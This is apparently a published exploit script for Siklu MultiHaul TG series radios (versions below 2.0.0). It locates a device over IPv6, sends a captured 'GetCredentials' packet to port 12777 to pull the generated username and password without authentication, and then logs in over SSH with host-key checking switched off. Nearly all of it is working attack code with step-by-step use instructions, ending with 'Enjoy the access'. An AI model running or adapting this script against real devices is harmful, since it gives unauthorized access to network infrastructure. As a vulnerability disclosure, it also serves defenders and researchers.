Siklu MultiHaul TG Series Credential Disclosure

`# Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure  
# Date: 28-02-2024  
# Exploit Author: semaja2  
# Vendor Homepage: https://siklu.com/  
# Software Link: https://partners.siklu.com/home/frontdoor  
# Version: < 2.0.0  
# Tested on: 2.0.0  
# CVE : None assigned  
#  
# Instructions  
# 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device  
# `ping6 -I en7 -c 2 ff02::1`  
# 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address  
# `ip -6 neigh show dev en7`  
# 3. Execute script  
# `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7`  
# 4. Enjoy the access  
  
  
  
import socket  
import sys  
import os  
  
address = str(sys.argv[1]) # the target  
port = 12777  
  
# Captured command, sends "GetCredentials" to obtain random generated username/password  
cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000")  
  
addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM)  
(family, socktype, proto, canonname, sockaddr) = addrinfo[0]  
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)  
s.connect(sockaddr)  
s.send(cmd)  
data = s.recv(200)  
s.close()  
output = "".join(map(chr, data))  
  
# Split output, then remove trailing noise as string length is always 35  
splits = output.split('#')  
username = splits[1][slice(0, 35, 1)]  
password = splits[2][slice(0, 35, 1)]  
print('Username: ', username)  
print('Password: ', password)  
os.system("sshpass -p {password} ssh -o StrictHostKeychecking=no {address} -l {username}".format(address = address, username = username, password = password))  
  
  
`